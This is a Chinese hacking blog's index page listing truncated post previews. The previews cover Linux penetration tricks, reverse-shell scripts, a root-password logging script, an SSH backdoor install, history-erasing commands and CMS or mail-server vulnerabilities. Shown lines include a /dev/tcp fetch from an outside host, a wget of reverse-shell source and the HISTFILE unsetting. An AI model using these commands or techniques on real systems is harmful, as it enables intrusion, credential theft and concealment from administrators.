暗月博客发表的所有文章

Linux常用渗透小技巧

1.无wget nc等下载工具时下载文件 exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.p...

11月21日moonsec_com327 views评论

阅读全文

moonsec_com

发个一句话附带连接方法

这个一句话是某个学员发给我的，我看了一下网上好像没有连接的办法稍微研究了一下结果连接方法就出来了

11月21日314 views评论

阅读全文

记录一个linux下小脚本(记录root密码）

#!/usr/bin/python import os, sys, getpass, time current_time = time.strftime("%Y-%m-%d %H:%M") logfi...

11月21日moonsec_com386 views评论

阅读全文

moonsec_com

PHPCMS V9 一个为所欲为的漏洞

phpcms phpsso_auth_key泄露: WooYun: PHPCMS V9 一个为所欲为的漏洞 http://www.2cto.com/phpsso_ser...

11月21日750 views评论

阅读全文

moonsec_com

建站之星Sitestar前台Getshell一枚

漏洞作者： ′ 雨。简要描述：看sitestar 在某数字公司还是属于一般应用的, 就准备提数字了。太坑了然后果断拒绝提交详情。还是提到乌云来把。不知道sitestar...

11月21日400 views评论

阅读全文

linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行

在线下载可以用 wget http://www.linux so.com/exp/shell.c wget http://www.linuxso.com/exp/shell.pl

11月21日moonsec_com1,102 views评论

阅读全文

moonsec_com

【国内数千机构邮箱的沦陷】eYou邮箱系统系列产品若干个漏洞

eYou是目前国内机构（高校、政府、企业）使用率最高的邮箱系统之一。今发现eYou邮件系统、eYou邮件网关系统有多处严重的安全隐患，攻击者可入侵服务器和盗取任意邮箱信息。影响...

11月21日1,378 views评论

阅读全文

moonsec_com

帝国备份王(Empirebak)万能cookie及拿shell

帝国备份王(Empirebak)万能cookie及拿shell 漏洞作者： Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...

11月21日535 views评论

阅读全文

Linux 入侵检测技巧知识

1. 登录ssh之后不记录history unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/...

11月21日moonsec_com341 views评论

阅读全文

moonsec_com

74CMS Sql注入漏洞一枚2

74CMS Sql注入漏洞一枚2 漏洞作者： ′ 雨。在plus/ajax_user.php中

11月21日419 views评论

阅读全文

教你ssh后门安装

首先需要root权限，取得root权限后放一个ssh后门，这样就算管理员改了root密码，你也可以通过这个sshbackdoor登入。。。 1、mv /etc/ssh/ssh_config /etc/...

11月21日moonsec_com660 views评论

阅读全文

C#常用字符串加密解密方法封装代码

//方法一 //须添加对System.Web的引用 //using System.Web.Security; /// <summary> /// SHA1加密字符串 /// </su...

11月21日moonsec_com308 views评论

阅读全文

暗月博客

Linux常用渗透小技巧

发个一句话附带连接方法

记录一个linux下小脚本(记录root密码）

PHPCMS V9 一个为所欲为的漏洞

建站之星Sitestar前台Getshell一枚

linux下反弹shell脚本 C版和Perl版 webshell反弹回命令行

【国内数千机构邮箱的沦陷】eYou邮箱系统系列产品若干个漏洞

Linux 入侵检测技巧知识

74CMS Sql注入漏洞一枚2

教你ssh后门安装

C#常用字符串加密解密方法封装代码

在线咨询

微信